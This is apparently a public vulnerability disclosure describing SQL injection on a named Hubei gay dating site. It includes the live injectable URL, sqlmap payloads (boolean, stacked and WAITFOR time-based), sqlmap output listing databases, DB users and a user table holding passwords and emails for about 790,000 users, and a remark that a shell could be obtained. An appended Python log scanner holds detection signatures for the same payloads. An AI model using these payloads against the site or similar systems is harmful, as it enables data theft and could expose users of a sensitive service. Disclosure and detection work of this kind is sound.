2015-09-10: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-10-25: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
Hubei gay dating site #Biluo Xingkong (碧落星空) has a SQL injection at one location, leaking roughly 790,000 users' information...
Injection link: http://chat.hbblxk.com:8880/register.asp?roomid=1351 dumps large amounts of data directly... In addition, the site's filesystem path can be read, so a shell could be obtained... Path: D:\ichat35\iChat_Admin\
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: roomid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: roomid=1351' AND 7316=7316 AND 'GiEK'='GiEK

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: roomid=1351'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: roomid=1351' WAITFOR DELAY '0:0:5'--
---
[14:44:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
available databases [7]:
[*] iChatUser
[*] mas@er
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
current database: 'iChatUser'
current user: 'ichat'
[14:45:21] [INFO] retrieved: BUILTIN\Administrators
[14:45:40] [INFO] retrieved: ichat
[14:45:45] [INFO] retrieved: sa
database management system users [3]:
[*] BUILTIN\\Administrators
[*] ichat
[*] sa
Database: iChatUser
[10 tables]
+----------------+
| RoomInfo       |
| UserInfe       |
| UserInfo       |
| dt`roperties   |
| reg            |
| sysconstraints |
| syssegments    |
| wenti          |
| ichat.D99_CMD  |
| ichat.D99_Tmp  |
+----------------+
Database: iChatUser
Table: UserInfo
[20 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| CreateDate   | datetime |
| MemberLevel  | int      |
| ModifyDate   | datetime |
| UserAnswer   | varchar  |
| UserArming   | varchar  |
| UserCredit   | int      |
| UserEmail    | varchar  |
| UserEnable   | int      |
| UserIcon     | varchar  |
| UserID       | int      |
| UserLastIP   | varchar  |
| UserLevel    | int      |
| UserMsgCount | int      |
| UserName     | varchar  |
| UserOicq     | varchar  |
| UserPassword | varchar  |
| UserPhoto    | varchar  |
| UserQuestion | varchar  |
| UserResume   | varchar  |
| UserSex      | int      |
+--------------+----------+
[16:41:22] [INFO] resumed: 796999
UserMsgCount |796999|
Roughly 790,000 users.
Dumping the data is too slow, so I did not dump it...
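As an added example (not part of the original report), the following Python scans IIS 6.0 W3C-format log lines for the three payload shapes sqlmap reported against the roomid parameter (boolean tautology, stacked query, WAITFOR DELAY). The log excerpt, client address and user agents are constructed placeholders, and the percent-encoding is what IIS records for a request as sqlmap sends it.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS 6.0 W3C log excerpt (not from the report); default field layout:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2015-09-10 14:44:29 192.0.2.10 GET /register.asp roomid=1351 8880 - 198.51.100.7 Mozilla/5.0 200 0 0
2015-09-10 14:44:30 192.0.2.10 GET /register.asp roomid=1351%27%20AND%207316%3D7316%20AND%20%27GiEK%27%3D%27GiEK 8880 - 198.51.100.7 sqlmap/1.0 200 0 0
2015-09-10 14:44:31 192.0.2.10 GET /register.asp roomid=1351%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 8880 - 198.51.100.7 sqlmap/1.0 200 0 0
2015-09-10 14:44:37 192.0.2.10 GET /register.asp roomid=1351%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 8880 - 198.51.100.7 sqlmap/1.0 200 0 0
2015-09-10 14:44:40 192.0.2.10 GET /register.asp roomid=1352 8880 - 198.51.100.7 Mozilla/5.0 200 0 0
"""

# One signature per technique in the sqlmap output (boolean-based blind, time-based blind,
# stacked queries), plus the trailing comment all three payloads use to discard the rest of the query.
SIGNATURES = [
    ("boolean_tautology", re.compile(r"\b(\d+)\s*=\s*\1\b")),
    ("time_based", re.compile(r"\bWAITFOR\s+DELAY\b", re.IGNORECASE)),
    ("stacked_query", re.compile(r";\s*(?:WAITFOR|EXEC|DECLARE|INSERT|UPDATE|DELETE|DROP|SELECT)\b", re.IGNORECASE)),
    ("comment_terminator", re.compile(r"--\s*$|/\*")),
]


def analyze_query(raw_query):
    """Percent-decode one cs-uri-query value and return the names of the signatures it matches."""
    decoded = unquote_plus(raw_query)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def scan_log(text):
    """Return one alert dict per suspicious request; ordinary requests produce nothing."""
    alerts = []
    for line in text.splitlines():
        if not line or line.startswith("#"):  # skip directives and blank lines
            continue
        fields = line.split()
        if len(fields) < 13:  # malformed line: ignore rather than abort the scan
            continue
        hits = analyze_query(fields[5])
        if hits:
            alerts.append({"time": f"{fields[0]} {fields[1]}", "client": fields[8],
                           "uri": fields[4], "query": unquote_plus(fields[5]), "signatures": hits})
    return alerts


def hits_per_client(alerts):
    """Count alerts per client IP; a burst from one address is the footprint of an automated tool."""
    counts = {}
    for a in alerts:
        counts[a["client"]] = counts.get(a["client"], 0) + 1
    return counts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(a["time"], a["client"], a["uri"], a["signatures"])
    print(hits_per_client(scan_log(SAMPLE_LOG)))
```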
Filter the input..
Vendor could not be contacted, or the vendor actively declined.